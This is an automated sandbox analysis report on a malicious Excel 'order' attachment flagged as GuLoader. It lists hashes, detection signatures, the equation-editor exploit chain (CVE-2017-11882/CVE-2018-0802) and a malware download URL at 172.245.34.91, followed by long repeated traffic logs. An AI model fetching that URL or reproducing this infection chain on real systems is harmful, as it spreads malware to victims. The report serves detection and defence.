Windows Analysis Report
ACP-2210825ORDER.xls

Overview

General Information

Sample Name: ACP-2210825ORDER.xls
Analysis ID: 755822
MD5: 6c84860292e2a4d210396b7012be9b8a
SHA1: 7061c26320bf8836b55ac660860fa0937ae8f48e
SHA256: cadae8bf6a2bcf1ee630695a250a481d22d0b6d409832f60070b118dfc3bca75
Tags: xls
Infos:

Detection

GuLoader
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Sigma detected: EQNEDT32.EXE connecting to internet
Multi AV Scanner detection for submitted file
Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)
Antivirus / Scanner detection for submitted sample
Sigma detected: File Dropped By EQNEDT32EXE
Antivirus detection for URL or domain
Antivirus detection for dropped file
Yara detected GuLoader
Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802)
Shellcode detected
Office equation editor drops PE file
Tries to detect virtualization through RDTSC time measurements
Office equation editor establishes network connection
Drops PE files to the user root directory
May sleep (evasive loops) to hinder dynamic analysis
Contains functionality to shutdown / reboot the system
Uses code obfuscation techniques (call, push, ret)
PE file contains sections with non-standard names
Internet Provider seen in connection with other malware
Detected potential crypto function
Stores files to the Windows start menu directory
Contains functionality to dynamically determine API calls
Found dropped PE file which has not been started or loaded
Downloads executable code via HTTP
Abnormal high CPU Usage
Potential document exploit detected (unknown TCP traffic)
Drops PE files
Contains functionality to read the PEB
Uses a known web browser user agent for HTTP communication
Contains functionality to download and execute PE files
Office Equation Editor has been started
Contains functionality to download and launch executables
Document contains embedded VBA macros
PE file contains more sections than normal
Drops PE files to the user directory
Potential document exploit detected (performs HTTP gets)
Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)
Creates a process in suspended mode (likely to inject code)
Contains functionality for read data from the clipboard

Classification

  • System is w7x64
  • EXCEL.EXE (PID: 1036 cmdline: "C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" /automation -Embedding MD5: D53B85E21886D2AF9815C377537BCAC3)
  • EQNEDT32.EXE (PID: 1168 cmdline: "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding MD5: A87236E214F6D42A65F5DEDAC816AEC8)
    • vbc.exe (PID: 1136 cmdline: "C:\Users\Public\vbc.exe" MD5: 7081C4822CF1C7572DD82822B8F27C49)
  • cleanup
No configs have been found
Source: 00000005.00000002.1187007837.00000000030C0000.00000040.00001000.00020000.00000000.sdmp, Rule: JoeSecurity_GuLoader_2, Description: Yara detected GuLoader, Author: Joe Security

    Exploits

    Source: Network Connection, Author: Joe Security, Data: DestinationIp: 172.245.34.91, DestinationIsIpv6: false, DestinationPort: 80, EventID: 3, Image: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, Initiated: true, ProcessId: 1168, Protocol: tcp, SourceIp: 192.168.2.22, SourceIsIpv6: false, SourcePort: 49173
    Source: File created, Author: Joe Security, Data: EventID: 11, Image: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, ProcessId: 1168, TargetFilename: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\VBC[1].exe
    No Snort rule has matched

    AV Detection

    Source: ACP-2210825ORDER.xls, Virustotal: Detection: 26%
    Source: ACP-2210825ORDER.xls, Avira: detected
    Source: http://172.245.34.91/5643/VBC.exe, Avira URL Cloud: Label: malware
    Source: C:\Users\user\AppData\Local\Temp\~DF688530565CAD41F4.TMP, Avira: detection malicious, Label: EXP/CVE-2017-11882.Gen

    Exploits

    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, Process created: C:\Users\Public\vbc.exe
    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, Network connect: IP: 172.245.34.91 Port: 80
    Source: unknown, Process created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE, File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll
    Source: C:\Users\Public\vbc.exe, Code function: 5_2_00406555 FindFirstFileW,FindClose,
    Source: C:\Users\Public\vbc.exe, Code function: 5_2_00405A03 CloseHandle,GetTempPathW,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,
    Source: C:\Users\Public\vbc.exe, Code function: 5_2_0040287E FindFirstFileW,

    Software Vulnerabilities

    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, Code function: 2_2_035406CF URLDownloadToFileW,ShellExecuteW,ExitProcess,
    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, Code function: 2_2_035406FD ShellExecuteW,ExitProcess,
    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, Code function: 2_2_03540660 LoadLibraryW,URLDownloadToFileW,ShellExecuteW,ExitProcess,
    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, Code function: 2_2_035405D4 URLDownloadToFileW,ShellExecuteW,ExitProcess,
    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, Code function: 2_2_035405F0 URLDownloadToFileW,ShellExecuteW,ExitProcess,
    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, Code function: 2_2_0354067A URLDownloadToFileW,ShellExecuteW,ExitProcess,
    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, Code function: 2_2_035405BB ExitProcess,
    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, Code function: 2_2_03540722 ExitProcess,
    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, Code function: 2_2_035406E8 ShellExecuteW,ExitProcess,
    Source: global traffic, TCP traffic: 192.168.2.22:49173 -> 172.245.34.91:80
    Source: global traffic, TCP traffic: 172.245.34.91:80 -> 192.168.2.22:49173
    Source: global trafficTCP traffic: 192.168.2.22:49173 -> 172.245.34.91:80
    Source: global trafficTCP traffic: 192.168.2.22:49173 -> 172.245.34.91:80
    Source: global trafficTCP traffic: 172.245.34.91:80 -> 192.168.2.22:49173
    Source: global trafficTCP traffic: 172.245.34.91:80 -> 192.168.2.22:49173
    Source: global trafficTCP traffic: 172.245.34.91:80 -> 192.168.2.22:49173
    Source: global trafficTCP traffic: 172.245.34.91:80 -> 192.168.2.22:49173
    Source: global trafficTCP traffic: 192.168.2.22:49173 -> 172.245.34.91:80
    Source: global trafficTCP traffic: 172.245.34.91:80 -> 192.168.2.22:49173
    Source: global trafficTCP traffic: 192.168.2.22:49173 -> 172.245.34.91:80
    Source: global trafficTCP traffic: 172.245.34.91:80 -> 192.168.2.22:49173
    Source: global trafficTCP traffic: 192.168.2.22:49173 -> 172.245.34.91:80
    Source: global trafficTCP traffic: 192.168.2.22:49173 -> 172.245.34.91:80
    Source: global trafficTCP traffic: 172.245.34.91:80 -> 192.168.2.22:49173
    Source: global trafficTCP traffic: 192.168.2.22:49173 -> 172.245.34.91:80
    Source: global trafficTCP traffic: 172.245.34.91:80 -> 192.168.2.22:49173
    Source: global trafficTCP traffic: 172.245.34.91:80 -> 192.168.2.22:49173
    Source: global trafficTCP traffic: 172.245.34.91:80 -> 192.168.2.22:49173
    Source: global trafficTCP traffic: 192.168.2.22:49173 -> 172.245.34.91:80
    Source: global trafficTCP traffic: 192.168.2.22:49173 -> 172.245.34.91:80
    Source: global trafficTCP traffic: 172.245.34.91:80 -> 192.168.2.22:49173
    Source: global trafficTCP traffic: 172.245.34.91:80 -> 192.168.2.22:49173
    Source: global trafficTCP traffic: 172.245.34.91:80 -> 192.168.2.22:49173
    Source: global trafficTCP traffic: 172.245.34.91:80 -> 192.168.2.22:49173
    Source: global trafficTCP traffic: 172.245.34.91:80 -> 192.168.2.22:49173
    Source: global trafficTCP traffic: 172.245.34.91:80 -> 192.168.2.22:49173
    Source: global trafficTCP traffic: 172.245.34.91:80 -> 192.168.2.22:49173
    Source: global trafficTCP traffic: 192.168.2.22:49173 -> 172.245.34.91:80
    Source: global trafficTCP traffic: 192.168.2.22:49173 -> 172.245.34.91:80
    Source: global trafficTCP traffic: 172.245.34.91:80 -> 192.168.2.22:49173
    Source: global trafficTCP traffic: 172.245.34.91:80 -> 192.168.2.22:49173
    Source: global trafficTCP traffic: 192.168.2.22:49173 -> 172.245.34.91:80
    Source: global trafficTCP traffic: 192.168.2.22:49173 -> 172.245.34.91:80
    Source: global trafficTCP traffic: 172.245.34.91:80 -> 192.168.2.22:49173
    Source: global trafficTCP traffic: 192.168.2.22:49173 -> 172.245.34.91:80
    Source: global trafficTCP traffic: 172.245.34.91:80 -> 192.168.2.22:49173
    Source: global trafficTCP traffic: 172.245.34.91:80 -> 192.168.2.22:49173
    Source: global trafficTCP traffic: 192.168.2.22:49173 -> 172.245.34.91:80
    Source: global trafficTCP traffic: 172.245.34.91:80 -> 192.168.2.22:49173
    Source: global trafficTCP traffic: 192.168.2.22:49173 -> 172.245.34.91:80
    Source: global trafficTCP traffic: 192.168.2.22:49173 -> 172.245.34.91:80
    Source: global trafficTCP traffic: 172.245.34.91:80 -> 192.168.2.22:49173
    Source: global trafficTCP traffic: 192.168.2.22:49173 -> 172.245.34.91:80
    Source: global trafficTCP traffic: 172.245.34.91:80 -> 192.168.2.22:49173
    Source: global trafficTCP traffic: 172.245.34.91:80 -> 192.168.2.22:49173
    Source: global trafficTCP traffic: 172.245.34.91:80 -> 192.168.2.22:49173
    Source: global trafficTCP traffic: 172.245.34.91:80 -> 192.168.2.22:49173
    Source: global trafficTCP traffic: 192.168.2.22:49173 -> 172.245.34.91:80
    Source: global trafficTCP traffic: 192.168.2.22:49173 -> 172.245.34.91:80
    Source: global trafficTCP traffic: 172.245.34.91:80 -> 192.168.2.22:49173
    Source: global trafficTCP traffic: 192.168.2.22:49173 -> 172.245.34.91:80
    Source: global trafficTCP traffic: 172.245.34.91:80 -> 192.168.2.22:49173
    Source: global trafficTCP traffic: 192.168.2.22:49173 -> 172.245.34.91:80
    Source: global trafficTCP traffic: 192.168.2.22:49173 -> 172.245.34.91:80
    Source: global trafficTCP traffic: 192.168.2.22:49173 -> 172.245.34.91:80
    Source: global trafficTCP traffic: 192.168.2.22:49173 -> 172.245.34.91:80
    Source: global trafficTCP traffic: 192.168.2.22:49173 -> 172.245.34.91:80
    Source: global trafficTCP traffic: 172.245.34.91:80 -> 192.168.2.22:49173
    Source: global trafficTCP traffic: 172.245.34.91:80 -> 192.168.2.22:49173
    Source: global trafficTCP traffic: 172.245.34.91:80 -> 192.168.2.22:49173
    Source: global trafficTCP traffic: 172.245.34.91:80 -> 192.168.2.22:49173
    Source: global trafficTCP traffic: 172.245.34.91:80 -> 192.168.2.22:49173
    Source: global trafficTCP traffic: 172.245.34.91:80 -> 192.168.2.22:49173
    Source: global trafficTCP traffic: 172.245.34.91:80 -> 192.168.2.22:49173
    Source: global trafficTCP traffic: 172.245.34.91:80 -> 192.168.2.22:49173
    Source: global trafficTCP traffic: 192.168.2.22:49173 -> 172.245.34.91:80
    Source: global trafficTCP traffic: 172.245.34.91:80 -> 192.168.2.22:49173
    Source: global trafficTCP traffic: 192.168.2.22:49173 -> 172.245.34.91:80
    Source: global trafficTCP traffic: 172.245.34.91:80 -> 192.168.2.22:49173
    Source: global trafficTCP traffic: 192.168.2.22:49173 -> 172.245.34.91:80
    Source: global trafficTCP traffic: 192.168.2.22:49173 -> 172.245.34.91:80
    Source: global trafficTCP traffic: 172.245.34.91:80 -> 192.168.2.22:49173
    Source: global trafficTCP traffic: 172.245.34.91:80 -> 192.168.2.22:49173
    Source: global trafficTCP traffic: 192.168.2.22:49173 -> 172.245.34.91:80
    Source: global trafficTCP traffic: 192.168.2.22:49173 -> 172.245.34.91:80
    Source: global trafficTCP traffic: 172.245.34.91:80 -> 192.168.2.22:49173
    Source: global trafficTCP traffic: 172.245.34.91:80 -> 192.168.2.22:49173
    Source: global trafficTCP traffic: 172.245.34.91:80 -> 192.168.2.22:49173
    Source: global trafficTCP traffic: 172.245.34.91:80 -> 192.168.2.22:49173
    Source: global trafficTCP traffic: 192.168.2.22:49173 -> 172.245.34.91:80
    Source: global trafficTCP traffic: 172.245.34.91:80 -> 192.168.2.22:49173
    Source: global trafficTCP traffic: 192.168.2.22:49173 -> 172.245.34.91:80
    Source: global trafficTCP traffic: 172.245.34.91:80 -> 192.168.2.22:49173
    Source: global trafficTCP traffic: 192.168.2.22:49173 -> 172.245.34.91:80
    Source: global trafficTCP traffic: 172.245.34.91:80 -> 192.168.2.22:49173
    Source: global trafficTCP traffic: 192.168.2.22:49173 -> 172.245.34.91:80
    Source: global trafficTCP traffic: 172.245.34.91:80 -> 192.168.2.22:49173
    Source: global trafficTCP traffic: 192.168.2.22:49173 -> 172.245.34.91:80
    Source: global trafficTCP traffic: 172.245.34.91:80 -> 192.168.2.22:49173
    Source: global trafficTCP traffic: 192.168.2.22:49173 -> 172.245.34.91:80
    Source: global trafficTCP traffic: 172.245.34.91:80 -> 192.168.2.22:49173
    Source: global trafficTCP traffic: 172.245.34.91:80 -> 192.168.2.22:49173
    Source: global trafficTCP traffic: 192.168.2.22:49173 -> 172.245.34.91:80
    Source: global trafficTCP traffic: 172.245.34.91:80 -> 192.168.2.22:49173
    Source: global trafficTCP traffic: 172.245.34.91:80 -> 192.168.2.22:49173
    Source: global trafficTCP traffic: 192.168.2.22:49173 -> 172.245.34.91:80
    Source: global trafficTCP traffic: 192.168.2.22:49173 -> 172.245.34.91:80
    Source: global trafficTCP traffic: 172.245.34.91:80 -> 192.168.2.22:49173
    Source: global trafficTCP traffic: 192.168.2.22:49173 -> 172.245.34.91:80
    Source: global trafficTCP traffic: 172.245.34.91:80 -> 192.168.2.22:49173
    Source: global trafficTCP traffic: 192.168.2.22:49173 -> 172.245.34.91:80
    Source: global trafficTCP traffic: 172.245.34.91:80 -> 192.168.2.22:49173
    Source: global trafficTCP traffic: 172.245.34.91:80 -> 192.168.2.22:49173
    Source: global trafficTCP traffic: 192.168.2.22:49173 -> 172.245.34.91:80
    Source: global trafficTCP traffic: 192.168.2.22:49173 -> 172.245.34.91:80
    Source: global trafficTCP traffic: 172.245.34.91:80 -> 192.168.2.22:49173
    Source: global trafficTCP traffic: 172.245.34.91:80 -> 192.168.2.22:49173
    Source: global trafficTCP traffic: 172.245.34.91:80 -> 192.168.2.22:49173
    Source: global trafficTCP traffic: 172.245.34.91:80 -> 192.168.2.22:49173
    Source: global trafficTCP traffic: 172.245.34.91:80 -> 192.168.2.22:49173
    Source: global trafficTCP traffic: 172.245.34.91:80 -> 192.168.2.22:49173
    Source: global trafficTCP traffic: 192.168.2.22:49173 -> 172.245.34.91:80
    Source: global trafficTCP traffic: 172.245.34.91:80 -> 192.168.2.22:49173
    Source: global trafficTCP traffic: 192.168.2.22:49173 -> 172.245.34.91:80
    Source: global trafficTCP traffic: 192.168.2.22:49173 -> 172.245.34.91:80
    Source: global trafficTCP traffic: 172.245.34.91:80 -> 192.168.2.22:49173
    Source: global trafficTCP traffic: 192.168.2.22:49173 -> 172.245.34.91:80
    Source: global trafficTCP traffic: 172.245.34.91:80 -> 192.168.2.22:49173
    Source: global trafficTCP traffic: 192.168.2.22:49173 -> 172.245.34.91:80
    Source: global trafficTCP traffic: 192.168.2.22:49173 -> 172.245.34.91:80
    Source: global trafficTCP traffic: 172.245.34.91:80 -> 192.168.2.22:49173
    Source: global trafficTCP traffic: 172.245.34.91:80 -> 192.168.2.22:49173
    Source: global trafficTCP traffic: 192.168.2.22:49173 -> 172.245.34.91:80
    Source: global trafficTCP traffic: 192.168.2.22:49173 -> 172.245.34.91:80
    Source: global trafficTCP traffic: 172.245.34.91:80 -> 192.168.2.22:49173
    Source: global trafficTCP traffic: 172.245.34.91:80 -> 192.168.2.22:49173
    Source: global trafficTCP traffic: 172.245.34.91:80 -> 192.168.2.22:49173
    Source: global trafficTCP traffic: 172.245.34.91:80 -> 192.168.2.22:49173
    Source: global trafficTCP traffic: 172.245.34.91:80 -> 192.168.2.22:49173
    Source: global trafficTCP traffic: 172.245.34.91:80 -> 192.168.2.22:49173
    Source: global trafficTCP traffic: 192.168.2.22:49173 -> 172.245.34.91:80
    Source: global trafficTCP traffic: 172.245.34.91:80 -> 192.168.2.22:49173
    Source: global trafficTCP traffic: 192.168.2.22:49173 -> 172.245.34.91:80
    Source: global trafficTCP traffic: 192.168.2.22:49173 -> 172.245.34.91:80
    Source: global trafficTCP traffic: 192.168.2.22:49173 -> 172.245.34.91:80
    Source: global trafficTCP traffic: 172.245.34.91:80 -> 192.168.2.22:49173
    Source: global trafficTCP traffic: 172.245.34.91:80 -> 192.168.2.22:49173
    Source: global trafficTCP traffic: 192.168.2.22:49173 -> 172.245.34.91:80
    Source: global trafficTCP traffic: 192.168.2.22:49173 -> 172.245.34.91:80
    Source: global trafficTCP traffic: 172.245.34.91:80 -> 192.168.2.22:49173
    Source: global trafficTCP traffic: 172.245.34.91:80 -> 192.168.2.22:49173
    Source: global trafficTCP traffic: 192.168.2.22:49173 -> 172.245.34.91:80
    Source: global trafficTCP traffic: 192.168.2.22:49173 -> 172.245.34.91:80
    Source: global trafficTCP traffic: 172.245.34.91:80 -> 192.168.2.22:49173
    Source: global trafficTCP traffic: 192.168.2.22:49173 -> 172.245.34.91:80
    Source: global trafficTCP traffic: 192.168.2.22:49173 -> 172.245.34.91:80
    Source: global trafficTCP traffic: 172.245.34.91:80 -> 192.168.2.22:49173
    Source: global trafficTCP traffic: 172.245.34.91:80 -> 192.168.2.22:49173
    Source: global trafficTCP traffic: 192.168.2.22:49173 -> 172.245.34.91:80
    Source: global trafficTCP traffic: 172.245.34.91:80 -> 192.168.2.22:49173
    Source: global trafficTCP traffic: 192.168.2.22:49173 -> 172.245.34.91:80
    Source: global trafficTCP traffic: 172.245.34.91:80 -> 192.168.2.22:49173
    Source: global trafficTCP traffic: 192.168.2.22:49173 -> 172.245.34.91:80
    Source: global trafficTCP traffic: 172.245.34.91:80 -> 192.168.2.22:49173
    Source: global trafficTCP traffic: 192.168.2.22:49173 -> 172.245.34.91:80
    Source: global trafficTCP traffic: 172.245.34.91:80 -> 192.168.2.22:49173
    Source: global trafficTCP traffic: 192.168.2.22:49173 -> 172.245.34.91:80
    Source: global trafficTCP traffic: 192.168.2.22:49173 -> 172.245.34.91:80
    Source: global trafficTCP traffic: 172.245.34.91:80 -> 192.168.2.22:49173
    Source: global trafficTCP traffic: 172.245.34.91:80 -> 192.168.2.22:49173
    Source: global trafficTCP traffic: 172.245.34.91:80 -> 192.168.2.22:49173
    Source: global trafficTCP traffic: 192.168.2.22:49173 -> 172.245.34.91:80
    Source: global trafficTCP traffic: 192.168.2.22:49173 -> 172.245.34.91:80
    Source: global trafficTCP traffic: 172.245.34.91:80 -> 192.168.2.22:49173
    Source: global trafficTCP traffic: 192.168.2.22:49173 -> 172.245.34.91:80
    Source: global trafficTCP traffic: 192.168.2.22:49173 -> 172.245.34.91:80
    Source: global trafficTCP traffic: 172.245.34.91:80 -> 192.168.2.22:49173
    Source: global trafficTCP traffic: 172.245.34.91:80 -> 192.168.2.22:49173
    Source: global trafficTCP traffic: 192.168.2.22:49173 -> 172.245.34.91:80
    Source: global trafficTCP traffic: 172.245.34.91:80 -> 192.168.2.22:49173
    Source: global trafficTCP traffic: 192.168.2.22:49173 -> 172.245.34.91:80
    Source: global trafficTCP traffic: 172.245.34.91:80 -> 192.168.2.22:49173
    Source: global trafficTCP traffic: 192.168.2.22:49173 -> 172.245.34.91:80
    Source: global trafficTCP traffic: 172.245.34.91:80 -> 192.168.2.22:49173
    Source: global trafficTCP traffic: 192.168.2.22:49173 -> 172.245.34.91:80
    Source: global trafficTCP traffic: 172.245.34.91:80 -> 192.168.2.22:49173
    Source: global trafficTCP traffic: 192.168.2.22:49173 -> 172.245.34.91:80
    Source: global trafficTCP traffic: 172.245.34.91:80 -> 192.168.2.22:49173
    Source: global trafficTCP traffic: 192.168.2.22:49173 -> 172.245.34.91:80
    Source: global trafficTCP traffic: 172.245.34.91:80 -> 192.168.2.22:49173
    Source: global trafficTCP traffic: 192.168.2.22:49173 -> 172.245.34.91:80
    Source: global trafficTCP traffic: 172.245.34.91:80 -> 192.168.2.22:49173
    Source: global trafficTCP traffic: 192.168.2.22:49173 -> 172.245.34.91:80
    Source: global trafficTCP traffic: 172.245.34.91:80 -> 192.168.2.22:49173
    Source: global trafficTCP traffic: 192.168.2.22:49173 -> 172.245.34.91:80
    Source: global trafficTCP traffic: 172.245.34.91:80 -> 192.168.2.22:49173
    Source: global trafficTCP traffic: 192.168.2.22:49173 -> 172.245.34.91:80
    Source: global trafficTCP traffic: 172.245.34.91:80 -> 192.168.2.22:49173
    Source: global trafficTCP traffic: 192.168.2.22:49173 -> 172.245.34.91:80
    Source: global trafficTCP traffic: 172.245.34.91:80 -> 192.168.2.22:49173
    Source: global trafficTCP traffic: 192.168.2.22:49173 -> 172.245.34.91:80
    Source: global trafficTCP traffic: 172.245.34.91:80 -> 192.168.2.22:49173
    Source: global trafficTCP traffic: 192.168.2.22:49173 -> 172.245.34.91:80
    Source: global trafficTCP traffic: 172.245.34.91:80 -> 192.168.2.22:49173
    Source: global trafficTCP traffic: 192.168.2.22:49173 -> 172.245.34.91:80
    Source: global trafficTCP traffic: 172.245.34.91:80 -> 192.168.2.22:49173
    Source: global trafficTCP traffic: 192.168.2.22:49173 -> 172.245.34.91:80
    Source: global trafficTCP traffic: 172.245.34.91:80 -> 192.168.2.22:49173
    Source: global trafficTCP traffic: 192.168.2.22:49173 -> 172.245.34.91:80
    Source: global trafficTCP traffic: 172.245.34.91:80 -> 192.168.2.22:49173
    Source: global trafficTCP traffic: 192.168.2.22:49173 -> 172.245.34.91:80
    Source: global trafficTCP traffic: 172.245.34.91:80 -> 192.168.2.22:49173
    Source: global trafficTCP traffic: 192.168.2.22:49173 -> 172.245.34.91:80
    Source: global trafficTCP traffic: 172.245.34.91:80 -> 192.168.2.22:49173
    Source: global trafficTCP traffic: 192.168.2.22:49173 -> 172.245.34.91:80
    Source: global trafficTCP traffic: 172.245.34.91:80 -> 192.168.2.22:49173
    Source: global trafficTCP traffic: 192.168.2.22:49173 -> 172.245.34.91:80
    Source: global trafficTCP traffic: 172.245.34.91:80 -> 192.168.2.22:49173
    Source: global trafficTCP traffic: 192.168.2.22:49173 -> 172.245.34.91:80
    Source: global trafficTCP traffic: 172.245.34.91:80 -> 192.168.2.22:49173
    Source: global trafficTCP traffic: 192.168.2.22:49173 -> 172.245.34.91:80
    Source: global trafficTCP traffic: 172.245.34.91:80 -> 192.168.2.22:49173
    Source: global trafficTCP traffic: 192.168.2.22:49173 -> 172.245.34.91:80
    Source: global trafficTCP traffic: 172.245.34.91:80 -> 192.168.2.22:49173
    Source: global trafficTCP traffic: 192.168.2.22:49173 -> 172.245.34.91:80
    Source: global trafficTCP traffic: 172.245.34.91:80 -> 192.168.2.22:49173
    Source: global trafficTCP traffic: 192.168.2.22:49173 -> 172.245.34.91:80
    Source: global trafficTCP traffic: 172.245.34.91:80 -> 192.168.2.22:49173
    Source: global trafficTCP traffic: 192.168.2.22:49173 -> 172.245.34.91:80
    Source: global trafficTCP traffic: 172.245.34.91:80 -> 192.168.2.22:49173
    Source: global trafficTCP traffic: 192.168.2.22:49173 -> 172.245.34.91:80
    Source: global trafficTCP traffic: 192.168.2.22:49173 -> 172.245.34.91:80
    Source: global trafficTCP traffic: 192.168.2.22:49173 -> 172.245.34.91:80
    Source: global trafficTCP traffic: 172.245.34.91:80 -> 192.168.2.22:49173
    Source: global trafficTCP traffic: 172.245.34.91:80 -> 192.168.2.22:49173
    Source: global trafficTCP traffic: 172.245.34.91:80 -> 192.168.2.22:49173
    Source: global trafficTCP traffic: 172.245.34.91:80 -> 192.168.2.22:49173
    Source: global trafficTCP traffic: 172.245.34.91:80 -> 192.168.2.22:49173
    Source: global trafficTCP traffic: 172.245.34.91:80 -> 192.168.2.22:49173
    Source: global trafficTCP traffic: 192.168.2.22:49173 -> 172.245.34.91:80
    Source: global trafficTCP traffic: 192.168.2.22:49173 -> 172.245.34.91:80
    Source: global trafficTCP traffic: 172.245.34.91:80 -> 192.168.2.22:49173
    Source: global trafficTCP traffic: 172.245.34.91:80 -> 192.168.2.22:49173
    Source: global trafficTCP traffic: 192.168.2.22:49173 -> 172.245.34.91:80
    Source: global trafficTCP traffic: 192.168.2.22:49173 -> 172.245.34.91:80
    Source: global trafficTCP traffic: 192.168.2.22:49173 -> 172.245.34.91:80
    Source: global trafficTCP traffic: 192.168.2.22:49173 -> 172.245.34.91:80
    Source: global trafficTCP traffic: 172.245.34.91:80 -> 192.168.2.22:49173
    Source: global trafficTCP traffic: 172.245.34.91:80 -> 192.168.2.22:49173
    Source: global trafficTCP traffic: 172.245.34.91:80 -> 192.168.2.22:49173
    Source: global trafficTCP traffic: 172.245.34.91:80 -> 192.168.2.22:49173
    Source: global trafficTCP traffic: 172.245.34.91:80 -> 192.168.2.22:49173
    Source: global trafficTCP traffic: 172.245.34.91:80 -> 192.168.2.22:49173
    Source: global trafficTCP traffic: 192.168.2.22:49173 -> 172.245.34.91:80
    Source: global trafficTCP traffic: 172.245.34.91:80 -> 192.168.2.22:49173
    Source: global trafficTCP traffic: 172.245.34.91:80 -> 192.168.2.22:49173
    Source: global trafficTCP traffic: 172.245.34.91:80 -> 192.168.2.22:49173
    Source: global trafficTCP traffic: 172.245.34.91:80 -> 192.168.2.22:49173
    Source: global trafficTCP traffic: 172.245.34.91:80 -> 192.168.2.22:49173
    Source: global trafficTCP traffic: 172.245.34.91:80 -> 192.168.2.22:49173
    Source: global trafficTCP traffic: 192.168.2.22:49173 -> 172.245.34.91:80
    Source: global trafficTCP traffic: 192.168.2.22:49173 -> 172.245.34.91:80
    Source: global trafficTCP traffic: 192.168.2.22:49173 -> 172.245.34.91:80
    Source: global trafficTCP traffic: 192.168.2.22:49173 -> 172.245.34.91:80
    Source: global trafficTCP traffic: 192.168.2.22:49173 -> 172.245.34.91:80
    Source: global trafficTCP traffic: 192.168.2.22:49173 -> 172.245.34.91:80
    Source: global trafficTCP traffic: 192.168.2.22:49173 -> 172.245.34.91:80
    Source: global trafficTCP traffic: 192.168.2.22:49173 -> 172.245.34.91:80
    Source: global trafficTCP traffic: 172.245.34.91:80 -> 192.168.2.22:49173
    Source: global trafficTCP traffic: 192.168.2.22:49173 -> 172.245.34.91:80
    Source: global trafficTCP traffic: 192.168.2.22:49173 -> 172.245.34.91:80
    Source: global trafficTCP traffic: 172.245.34.91:80 -> 192.168.2.22:49173
    Source: global trafficTCP traffic: 172.245.34.91:80 -> 192.168.2.22:49173
    Source: global trafficTCP traffic: 192.168.2.22:49173 -> 172.245.34.91:80
    Source: global trafficTCP traffic: 172.245.34.91:80 -> 192.168.2.22:49173
    Source: global trafficTCP traffic: 172.245.34.91:80 -> 192.168.2.22:49173
    Source: global trafficTCP traffic: 172.245.34.91:80 -> 192.168.2.22:49173
    Source: global trafficTCP traffic: 172.245.34.91:80 -> 192.168.2.22:49173
    Source: global trafficTCP traffic: 192.168.2.22:49173 -> 172.245.34.91:80
    Source: global trafficTCP traffic: 192.168.2.22:49173 -> 172.245.34.91:80
    Source: global trafficTCP traffic: 172.245.34.91:80 -> 192.168.2.22:49173
    Source: global trafficTCP traffic: 192.168.2.22:49173 -> 172.245.34.91:80
    Source: global trafficTCP traffic: 192.168.2.22:49173 -> 172.245.34.91:80
    Source: global trafficTCP traffic: 172.245.34.91:80 -> 192.168.2.22:49173
    Source: global trafficTCP traffic: 192.168.2.22:49173 -> 172.245.34.91:80
    Source: global trafficTCP traffic: 172.245.34.91:80 -> 192.168.2.22:49173
    Source: global trafficTCP traffic: 192.168.2.22:49173 -> 172.245.34.91:80
    Source: global trafficTCP traffic: 192.168.2.22:49173 -> 172.245.34.91:80
    Source: global trafficTCP traffic: 172.245.34.91:80 -> 192.168.2.22:49173
    Source: global trafficTCP traffic: 192.168.2.22:49173 -> 172.245.34.91:80
    Source: global trafficTCP traffic: 172.245.34.91:80 -> 192.168.2.22:49173
    Source: global trafficTCP traffic: 172.245.34.91:80 -> 192.168.2.22:49173
    Source: global trafficTCP traffic: 192.168.2.22:49173 -> 172.245.34.91:80
    Source: global trafficTCP traffic: 172.245.34.91:80 -> 192.168.2.22:49173
    Source: global trafficTCP traffic: 192.168.2.22:49173 -> 172.245.34.91:80
    Source: global trafficTCP traffic: 172.245.34.91:80 -> 192.168.2.22:49173
    Source: global trafficTCP traffic: 192.168.2.22:49173 -> 172.245.34.91:80
    Source: global trafficTCP traffic: 172.245.34.91:80 -> 192.168.2.22:49173
    Source: global trafficTCP traffic: 192.168.2.22:49173 -> 172.245.34.91:80
    Source: global trafficTCP traffic: 172.245.34.91:80 -> 192.168.2.22:49173
    Source: global trafficTCP traffic: 192.168.2.22:49173 -> 172.245.34.91:80
    Source: global trafficTCP traffic: 172.245.34.91:80 -> 192.168.2.22:49173
    Source: global trafficTCP traffic: 192.168.2.22:49173 -> 172.245.34.91:80
    Source: global trafficTCP traffic: 172.245.34.91:80 -> 192.168.2.22:49173
    Source: global trafficTCP traffic: 192.168.2.22:49173 -> 172.245.34.91:80
    Source: global trafficTCP traffic: 192.168.2.22:49173 -> 172.245.34.91:80
    Source: global trafficTCP traffic: 172.245.34.91:80 -> 192.168.2.22:49173
